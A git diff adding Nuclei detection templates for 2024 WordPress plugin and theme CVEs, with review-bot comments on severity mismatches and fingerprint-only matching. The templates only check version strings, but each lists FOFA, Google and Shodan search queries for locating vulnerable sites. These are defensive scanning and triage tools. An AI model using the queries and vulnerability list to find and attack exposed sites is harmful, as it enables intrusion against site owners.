@@ -0,0 +1,59 @@ +id: CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1 + +info: + name: > + Leopard - WordPress offload media <= 2.0.36 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.36. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/00aba7b3-4d4a-4aba-8e4e-2e8a928f6143?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43257 + metadata: + fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/" + google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/" + shodan-query: 'vuln:CVE-2024-43257' + tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "leopard-wordpress-offload-media" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.36') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml b/poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml new file mode 100644 index 0000000000..f0e501ee97 --- /dev/null 
+++ b/poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42 + +info: + name: > + Store Locator Plus <= 2311.17.01 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Store Locator Plus® for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2311.17.01. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3597fa-71e2-4753-b226-5d95e576947a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43258 + metadata: + fofa-query: "wp-content/plugins/store-locator-le/" + google-query: inurl:"/wp-content/plugins/store-locator-le/" + shodan-query: 'vuln:CVE-2024-43258' + tags: cve,wordpress,wp-plugin,store-locator-le,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/store-locator-le/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "store-locator-le" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2311.17.01') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml b/poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml new file mode 100644 index 0000000000..7d86a18f26 --- /dev/null +++ b/poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml 
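Review bot: The gate `compare_versions(version, '<= 2311.17.01')` depends on the DSL's version parser accepting a zero-padded component (`01`); if it normalises `01` to `1` the comparison works, but if it rejects the string the DSL matcher fails silently and every host is reported clean, so this one is worth a quick run against a readme carrying `Stable tag: 2311.17.01`. The `([0-9.]+)` extractor will capture the value as written, so the only question is on the compare side. As with the other templates in this commit, a hit is a readme fingerprint and says nothing about whether the information exposure is actually reachable.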
@@ -0,0 +1,59 @@ +id: CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6 + +info: + name: > + Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Order Export for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.23. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e3f8108-6b1b-4720-a450-e58b1833b608?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43259 + metadata: + fofa-query: "wp-content/plugins/order-export-and-more-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/order-export-and-more-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-43259' + tags: cve,wordpress,wp-plugin,order-export-and-more-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/order-export-and-more-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "order-export-and-more-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml b/poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml new file mode 100644 index 0000000000..74b098c79e --- /dev/null +++ b/poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c + +info: + name: > + Clearfy Cache <= 2.2.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc29341-a23e-4694-b852-90794c01473a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43260 + metadata: + fofa-query: "wp-content/plugins/clearfy/" + google-query: inurl:"/wp-content/plugins/clearfy/" + shodan-query: 'vuln:CVE-2024-43260' + tags: cve,wordpress,wp-plugin,clearfy,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clearfy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clearfy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml b/poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml new file mode 100644 index 0000000000..6acdc8e51e --- /dev/null +++ b/poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43261-678706860c4e57cd059d9f119dea313a + +info: + name: > + Compute Links <= 1.2.1 - Unauthenticated Remote File Inclusion + author: topscoder + severity: critical + description: > + The Compute Links plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2b78e0-1b82-4074-8051-e44dcfe3ac51?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43261 + metadata: + fofa-query: "wp-content/plugins/compute-links/" + google-query: inurl:"/wp-content/plugins/compute-links/" + shodan-query: 'vuln:CVE-2024-43261' + tags: cve,wordpress,wp-plugin,compute-links,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/compute-links/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "compute-links" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml b/poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml new file mode 100644 index 0000000000..0b37abb3d7 --- /dev/null +++ b/poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml 
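Review bot: A `critical` / 9.8 finding is raised here on nothing more than `readme.txt` reporting `Stable tag` at or below `1.2.1`, so a stale readme or a deactivated plugin directory produces a critical alert with no evidence that the remote include is reachable. At this severity the template should say so to whoever triages it, e.g. next to `severity`: `# fingerprint-only: matches readme Stable tag, makes no inclusion attempt — verify before reporting`. The description's "resulting in code execution" is also not something the template checks, and whether a remote include yields execution still depends on the host's PHP configuration, so that wording should be kept only if the referenced advisory states it.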
@@ -0,0 +1,59 @@ +id: CVE-2024-43262-1a861225d324308d9705bd093a6382ee + +info: + name: > + Busiprof <= 2.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Busiprof theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0acf3219-1443-42cc-b3c9-cffb8fd8af07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43262 + metadata: + fofa-query: "wp-content/themes/busiprof/" + google-query: inurl:"/wp-content/themes/busiprof/" + shodan-query: 'vuln:CVE-2024-43262' + tags: cve,wordpress,wp-theme,busiprof,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/busiprof/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "busiprof" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml b/poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml new file mode 100644 index 0000000000..5e8eea816e --- /dev/null +++ b/poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml 
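Review bot: `severity: low` contradicts the template's own classification, which carries `cvss-score: 6.4` with `S:C/C:L/I:L` — medium on the CVSS 3.1 scale — and the `low` value is repeated as the last entry of `tags`. Either the severity or the score is wrong; if the score comes from the Wordfence entry, the fix is `severity: medium` and `tags: cve,wordpress,wp-theme,busiprof,medium`. Note this template fingerprints `style.css` `Version:` rather than a readme `Stable tag`; that header is what WordPress itself reads for a theme, so it is a somewhat firmer version signal than the plugin templates in this commit, though it still says nothing about whether the theme is active.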
@@ -0,0 +1,59 @@ +id: CVE-2024-43263-239fd68ccb4495d13837323dbe18444e + +info: + name: > + Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Visual Composer Starter theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43263 + metadata: + fofa-query: "wp-content/themes/visual-composer-starter/" + google-query: inurl:"/wp-content/themes/visual-composer-starter/" + shodan-query: 'vuln:CVE-2024-43263' + tags: cve,wordpress,wp-theme,visual-composer-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-composer-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml b/poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml new file mode 100644 index 0000000000..6a2d7268f1 --- /dev/null 
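Review bot: Same inconsistency as the other stored-XSS templates in this commit: `severity: low` alongside `cvss-score: 6.4` (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N`), which is medium on the CVSS 3.1 scale. Pick one source of truth; if the vector is authoritative the change is `severity: medium` and `tags: cve,wordpress,wp-theme,visual-composer-starter,medium`. Anyone filtering nuclei output by severity will otherwise drop these findings from a medium-and-up scan.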
+++ b/poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4 + +info: + name: > + Create by Mediavine <= 1.9.8 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The Create by Mediavine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.8. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c04e40a-6d94-4688-9159-07bf27a9efe0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43264 + metadata: + fofa-query: "wp-content/plugins/mediavine-create/" + google-query: inurl:"/wp-content/plugins/mediavine-create/" + shodan-query: 'vuln:CVE-2024-43264' + tags: cve,wordpress,wp-plugin,mediavine-create,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mediavine-create/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mediavine-create" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml b/poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml new file mode 100644 index 0000000000..b77df5cb64 --- /dev/null +++ b/poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592 + +info: + name: > + Analytify <= 5.3.1 - Cross-Site Request Forgery to Opt-out + author: topscoder + severity: medium + description: > + The Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.3.1. This is due to missing or incorrect nonce validation on the optout_yes() function. This makes it possible for unauthenticated attackers to opt out of tracking via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e407409-989d-48f8-8135-6071015a6064?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43265 + metadata: + fofa-query: "wp-content/plugins/wp-analytify/" + google-query: inurl:"/wp-content/plugins/wp-analytify/" + shodan-query: 'vuln:CVE-2024-43265' + tags: cve,wordpress,wp-plugin,wp-analytify,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-analytify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-analytify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml b/poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml new file mode 100644 index 0000000000..deaacbd8f6 --- /dev/null 
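Review bot: The CVSS vector `PR:L/UI:N` does not describe the bug the description narrates: a CSRF that an unauthenticated attacker triggers by tricking an administrator into clicking a link is `PR:N/UI:R`, which is exactly what the sibling template CVE-2024-43269 in this commit uses for the same class of issue. One of the two is a transcription error; if the Wordfence entry gives `AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N`, the line to change is `cvss-metrics:` (both vectors score 4.3, so the score line cannot settle which is right). The `optout_yes()` function named in the description is not exercised; the match is still only a `readme.txt` version fingerprint.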
+++ b/poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7 + +info: + name: > + WP Job Portal <= 2.1.6 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.6 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/630e4595-4be3-4886-8771-f781bcee674d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43266 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-43266' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml b/poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml new file mode 100644 index 0000000000..ede979ccb8 --- /dev/null 
+++ b/poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16 + +info: + name: > + Mega Addons For Elementor <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Mega Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a64c67de-1c16-4dcb-a3e4-81341b37c3e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43267 + metadata: + fofa-query: "wp-content/plugins/ultimate-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/ultimate-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-43267' + tags: cve,wordpress,wp-plugin,ultimate-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file 
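Review bot: `severity: low` with `cvss-score: 6.4` is the same low/medium mismatch seen on the other stored-XSS templates in this commit; `severity: medium` and the matching final `tags` value would align it with the vector. Separately, the title says "Mega Addons For Elementor" while every path and query uses the slug `ultimate-addons-for-elementor`; the two may well be the same plugin directory under an older name, but it is worth confirming against the Wordfence entry, because a wrong slug means `readme.txt` is never found and the CVE silently goes undetected rather than failing loudly.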
diff --git a/poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml b/poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml new file mode 100644 index 0000000000..003ee9c4b1 --- /dev/null +++ b/poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe + +info: + name: > + Backup and Restore WordPress <= 1.50 - Missing Authorization + author: topscoder + severity: low + description: > + The Backup and Restore WordPress – Backup Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.50. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/61a050bd-deaa-4115-baa5-f63790816450?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43268 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43268' + tags: cve,wordpress,wp-plugin,wp-backitup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml b/poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml new file mode 100644 index 0000000000..7f125af4b7 --- /dev/null +++ b/poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Backup and Restore WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.50. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa15939c-44eb-45e5-95d7-49307912f21c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43269 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43269' + tags: cve,wordpress,wp-plugin,wp-backitup,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml b/poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml new file mode 100644 index 0000000000..143b5e70a9 --- /dev/null +++ b/poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43270-00633de45e44065b1555bce09f62fb9d + +info: + name: > + Backup and Restore WordPress <= 1.50 - Missing Authorization + author: topscoder + severity: high + description: > + The Backup and Restore WordPress – Backup Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.50. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f35838f-4a7d-4d25-9e5e-956411e59b62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43270 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43270' + tags: cve,wordpress,wp-plugin,wp-backitup,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file 
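Review bot: `severity: high` is not supported by the template's own score: `cvss-score: 5.3` with `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N` is medium on the CVSS 3.1 scale, and `high` is carried again as the last `tags` entry. If the unauthenticated reach is what motivated `high`, that is already priced into `PR:N` and the 5.3; otherwise change to `severity: medium` and `tags: cve,wordpress,wp-plugin,wp-backitup,medium`. Note also that this is the third template in this commit keyed on the identical `wp-backitup/readme.txt` `<= 1.50` check (with CVE-2024-43268 and CVE-2024-43269), so every matching host will yield three findings from one fingerprint, which triage should expect.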
diff --git a/poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml b/poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml new file mode 100644 index 0000000000..30d4ec8488 --- /dev/null +++ b/poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml 
